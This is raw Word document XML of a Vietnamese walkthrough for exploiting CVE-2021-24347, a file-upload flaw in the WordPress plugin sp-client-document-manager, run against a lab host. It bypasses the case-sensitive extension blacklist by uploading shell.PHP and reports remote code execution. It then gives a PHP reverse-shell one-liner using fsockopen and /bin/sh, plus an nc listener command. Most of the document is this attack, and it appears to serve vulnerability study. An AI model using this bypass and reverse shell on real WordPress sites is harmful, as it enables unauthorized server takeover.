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20574" w14:textId="1A7A5E8B" w:rsidR="00126C8F" w:rsidRDefault="00126C8F" w:rsidP="00126C8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CVE-2021-24347 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6389BDDB" w14:textId="5FFCAFD6" w:rsidR="00126C8F" w:rsidRDefault="00126C8F" w:rsidP="00126C8F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nội</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dung :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> plugin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00126C8F">
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00126C8F">
        <w:t>-client-document-manager-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00126C8F">
        <w:t>fileview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4.2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7BF2985B" w14:textId="03D0BD0D" w:rsidR="00126C8F" w:rsidRDefault="00126C8F" w:rsidP="00126C8F">
      <w:r>
        <w:t>Base core :8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444C2E4B" w14:textId="654D7619" w:rsidR="00126C8F" w:rsidRDefault="00126C8F" w:rsidP="00126C8F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3790DD58" wp14:editId="2CA7B976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9C62" w14:textId="180A6F1A" w:rsidR="00126C8F" w:rsidRDefault="00126C8F" w:rsidP="00126C8F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plugin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upload file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 w:rsidR="000D10F7">
        <w:t>có</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D10F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D10F7">
        <w:t>thể</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D10F7">
        <w:t xml:space="preserve"> upload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6354E82C" w14:textId="38B82A88" w:rsidR="000D10F7" w:rsidRDefault="000D10F7" w:rsidP="00126C8F">
      <w:r>
        <w:t xml:space="preserve">Endpoint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thác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135F91">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.83.128/wp-admin/admin.php?page=sp-client-document-manager-fileview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C050EC3" w14:textId="5C70E572" w:rsidR="000D10F7" w:rsidRDefault="000D10F7" w:rsidP="00126C8F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upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>được</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file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gramStart"/>
      <w:r>
        <w:t xml:space="preserve">upload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upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AE86D3" w14:textId="2642AE04" w:rsidR="000D10F7" w:rsidRDefault="000D10F7" w:rsidP="00126C8F">
      <w:r>
        <w:t xml:space="preserve">Khi upload file ta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file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>txt ,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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>py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file php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filter extension </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>của</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file upload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671AA458" w14:textId="5B003C10" w:rsidR="000D10F7" w:rsidRDefault="000D10F7" w:rsidP="000D10F7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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nhé</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="330D1E29" w14:textId="7181C389" w:rsidR="000D10F7" w:rsidRDefault="000D10F7" w:rsidP="000D10F7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vậy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r w:rsidR="00735834">
        <w:t xml:space="preserve">file code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00735834">
        <w:t>xử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00735834">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00735834">
        <w:t>lý</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00735834">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00735834">
        <w:t>các</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00735834">
        <w:t xml:space="preserve"> file upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00735834">
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00735834">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00735834">
        <w:t>tìm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00735834">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00735834">
        <w:t>hàm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00735834">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00735834">
        <w:t>xử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00735834">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00735834">
        <w:t>lí</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00735834">
        <w:t xml:space="preserve"> file extension </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00735834">
        <w:t>để</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00735834">
        <w:t xml:space="preserve"> bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A376591" w14:textId="174B428C" w:rsidR="00735834" w:rsidRDefault="00735834" w:rsidP="00735834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ở source plugin ta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thấy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shortcode.php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upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D44A21E" w14:textId="62EB984C" w:rsidR="00735834" w:rsidRDefault="00735834" w:rsidP="00735834">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D3DEE4D" wp14:editId="7E38A143">
            <wp:extent cx="45815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8CE8" w14:textId="4986458C" w:rsidR="00735834" w:rsidRDefault="00735834" w:rsidP="00735834">
      <w:r>
        <w:t xml:space="preserve">Function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sp_cdm_check_file_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) dung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cái</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extension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extension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upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26F5BC" w14:textId="6DC2773D" w:rsidR="00735834" w:rsidRDefault="00735834" w:rsidP="00735834">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2218B81B" wp14:editId="57AB2566">
            <wp:extent cx="59436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4CEE" w14:textId="26EBD4A5" w:rsidR="00735834" w:rsidRDefault="00002CBF" w:rsidP="00735834">
      <w:r>
        <w:t xml:space="preserve">Ta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thấy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> filename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 xml:space="preserve">) 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sanitize_file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">()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</w:p>
    <w:p w14:paraId="404993F6" w14:textId="2BD9DA20" w:rsidR="00002CBF" w:rsidRDefault="00002CBF" w:rsidP="00735834">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D68ABC8" wp14:editId="4F9BCC47">
            <wp:extent cx="59436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D2AB" w14:textId="348EE0F1" w:rsidR="00002CBF" w:rsidRDefault="00002CBF" w:rsidP="00735834"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ascii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accents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">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apply_filters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68583AEA" w14:textId="3D80984F" w:rsidR="00002CBF" w:rsidRDefault="00002CBF" w:rsidP="00735834">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Biến</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_path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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095FE0F9" w14:textId="5CDE7119" w:rsidR="00002CBF" w:rsidRDefault="00002CBF" w:rsidP="00735834"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/wp-content/uploads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-client-document-manager/$id/$filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D383AEB" w14:textId="7472F35F" w:rsidR="0069069D" w:rsidRDefault="0069069D" w:rsidP="00735834"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abc.PHP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blacklist  =&gt; up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excute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> php </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bằng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> trick </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>này</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C248E0A" w14:textId="2C470154" w:rsidR="0069069D" w:rsidRDefault="0069069D" w:rsidP="0073583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shell.PHP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50EE89B6" w14:textId="77777777" w:rsidR="0069069D" w:rsidRDefault="0069069D" w:rsidP="0069069D">
      <w:r>
        <w:t xml:space="preserve">&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A25E601" w14:textId="77777777" w:rsidR="0069069D" w:rsidRDefault="0069069D" w:rsidP="0069069D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3B0ABDC5" w14:textId="4B42FCB5" w:rsidR="0069069D" w:rsidRDefault="0069069D" w:rsidP="0069069D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E57F39" w14:textId="78EF6990" w:rsidR="0069069D" w:rsidRDefault="0069069D" w:rsidP="0069069D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DD21910" wp14:editId="1204FEB5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A271" w14:textId="125A1205" w:rsidR="0069069D" w:rsidRDefault="0069069D" w:rsidP="0069069D"/>
    <w:p w14:paraId="2471FC65" w14:textId="49A98056" w:rsidR="0069069D" w:rsidRDefault="0069069D" w:rsidP="0069069D">
      <w:r>
        <w:t xml:space="preserve">Sau </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>khi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> upload file ta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thấy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server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AD4541" w14:textId="09BECCE6" w:rsidR="0069069D" w:rsidRDefault="0069069D" w:rsidP="0069069D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47ADBF87" wp14:editId="06938AE6">
            <wp:extent cx="59340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4C0C" w14:textId="2CB3E0D8" w:rsidR="0069069D" w:rsidRDefault="0069069D" w:rsidP="0069069D"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target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</w:p>
    <w:p w14:paraId="0BC5917E" w14:textId="76EE1B21" w:rsidR="000909B9" w:rsidRDefault="000909B9" w:rsidP="0069069D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12A5E245" wp14:editId="42A689FB">
            <wp:extent cx="59436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A744" w14:textId="59447599" w:rsidR="000909B9" w:rsidRDefault="000909B9" w:rsidP="0069069D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name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proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32605336" w14:textId="733D243E" w:rsidR="000909B9" w:rsidRDefault="000909B9" w:rsidP="0069069D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BE473E4" wp14:editId="746574C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62C7" w14:textId="244215FC" w:rsidR="000909B9" w:rsidRDefault="000909B9" w:rsidP="0069069D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>RCE !!!!!!!!!!!!!!!!!!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2F693623" w14:textId="26EB7DF4" w:rsidR="006B0AFC" w:rsidRDefault="000909B9" w:rsidP="0069069D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Để</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rce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 w:rsidR="006B0AFC">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B0AFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B0AFC">
        <w:t>nội</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B0AFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006B0AFC">
        <w:t>dung :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0AF8894C" w14:textId="48048970" w:rsidR="006B0AFC" w:rsidRDefault="006B0AFC" w:rsidP="0069069D">
      <w:r w:rsidRPr="006B0AFC">
        <w:t>php -r '$sock=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B0AFC">
        <w:t>fsockopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B0AFC">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B0AFC">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0AFC">
        <w:t>);exec("/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B0AFC">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B0AFC">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B0AFC">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B0AFC">
        <w:t xml:space="preserve"> &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94FC36" w14:textId="2128799B" w:rsidR="006B0AFC" w:rsidRPr="00126C8F" w:rsidRDefault="006B0AFC" w:rsidP="0069069D">
      <w:r>
        <w:t xml:space="preserve">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lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $port </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006B0AFC" w:rsidRPr="001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6817"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DBA1F6A"/>
    <w:lvl w:ilvl="0" w:tplc="3F8AF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47C65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59E4F7B8"/>
    <w:lvl w:ilvl="0" w:tplc="00647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6397"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAAC11A2"/>
    <w:lvl w:ilvl="0" w:tplc="1AEAF7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F"/>
    <w:rsid w:val="00002CBF"/>
    <w:rsid w:val="000909B9"/>
    <w:rsid w:val="000D10F7"/>
    <w:rsid w:val="00126C8F"/>
    <w:rsid w:val="0069069D"/>
    <w:rsid w:val="006B0AFC"/>
    <w:rsid w:val="00735834"/>
    <w:rsid w:val="00F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48E9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DFF724F4-5212-42C8-A963-C9C5C70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AF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6B0AFC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006B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83.128/wp-admin/admin.php?page=sp-client-document-manager-file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2021-07-12T07:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-12T08:40:00Z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219759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D9.1.4</vt:lpwstr>
  </property>
</Properties>
</file>